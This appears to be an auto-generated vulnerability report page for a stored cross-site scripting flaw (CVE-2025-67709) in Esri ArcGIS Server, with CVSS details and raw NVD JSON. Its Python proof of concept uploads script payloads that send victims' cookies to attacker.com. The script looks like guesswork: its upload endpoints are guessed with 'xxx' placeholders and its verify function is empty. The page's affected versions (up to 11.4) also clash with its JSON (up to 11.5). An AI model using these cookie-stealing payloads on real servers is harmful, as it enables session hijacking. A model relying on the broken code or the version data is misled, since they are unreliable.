Security Vulnerability Report
中文
CVE-2025-67709 CVSS 6.1 MEDIUM

CVE-2025-67709

Published: 2025-12-31 23:15:42
Last Modified: 2026-01-06 19:04:28

Description

There is a stored cross site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim’s browser.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:esri:arcgis_server:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Esri ArcGIS Server <= 11.4 (Windows)
Esri ArcGIS Server <= 11.4 (Linux)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-67709 PoC - Stored XSS in Esri ArcGIS Server # Target: Esri ArcGIS Server 11.4 and earlier TARGET_URL = "https://<target-server>:6443/arcgis" CVE_ID = "CVE-2025-67709" def exploit_stored_xss(): """ Stored XSS exploitation attempt for ArcGIS Server This PoC demonstrates how malicious script can be stored """ # Malicious payload - XSS with cookie stealing xss_payload = '''<script>fetch('https://attacker.com/log?cookie='+document.cookie)</script>''' # Alternative payload with event handler xss_payload_alt = '''<img src=x onerror="fetch('https://attacker.com/exfil?data='+btoa(document.cookie))">''' # Target endpoint for file upload (example path) upload_endpoints = [ "/arcgis/sharing/rest/content/features/generate", "/arcgis/admin/uploads", "/arcgis/services/xxx/FeatureServer/upload" ] print(f"[*] Testing {CVE_ID} on {TARGET_URL}") for endpoint in upload_endpoints: try: # Attempt to upload file with XSS payload files = { 'file': ('malicious_file.txt', xss_payload, 'text/plain') } response = requests.post( f"{TARGET_URL}{endpoint}", files=files, timeout=10 ) if response.status_code == 200: print(f"[+] Potential XSS stored at: {endpoint}") print(f"[+] Payload: {xss_payload}") except requests.exceptions.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") def verify_vulnerability(): """ Verify if the uploaded XSS payload is executable """ # Check if stored content is rendered without sanitization verify_endpoints = [ "/arcgis/sharing/rest/content/items/xxx?f=html", "/arcgis/home/item.html?id=xxx" ] print("[*] Verifying XSS execution...") if __name__ == "__main__": print(f"CVE-2025-67709 PoC - Esri ArcGIS Server Stored XSS") print("=" * 60) exploit_stored_xss()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67709", "sourceIdentifier": "[email protected]", "published": "2025-12-31T23:15:42.130", "lastModified": "2026-01-06T19:04:27.810", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is a stored cross site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim’s browser."}, {"lang": "es", "value": "Hay un problema de cross-site scripting almacenado en Esri ArcGIS Server 11.4 y versiones anteriores en Windows y Linux que en algunas configuraciones permite a un atacante remoto no autenticado almacenar archivos que contienen código malicioso que puede ejecutarse en el contexto del navegador de una víctima."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:esri:arcgis_server:*:*:*:*:*:*:*:*", "versionEndIncluding": "11.5", "matchCriteriaId": "EC44DA7C-0CB3-4D79-B502-2B26954DB4DC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-2-patch", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}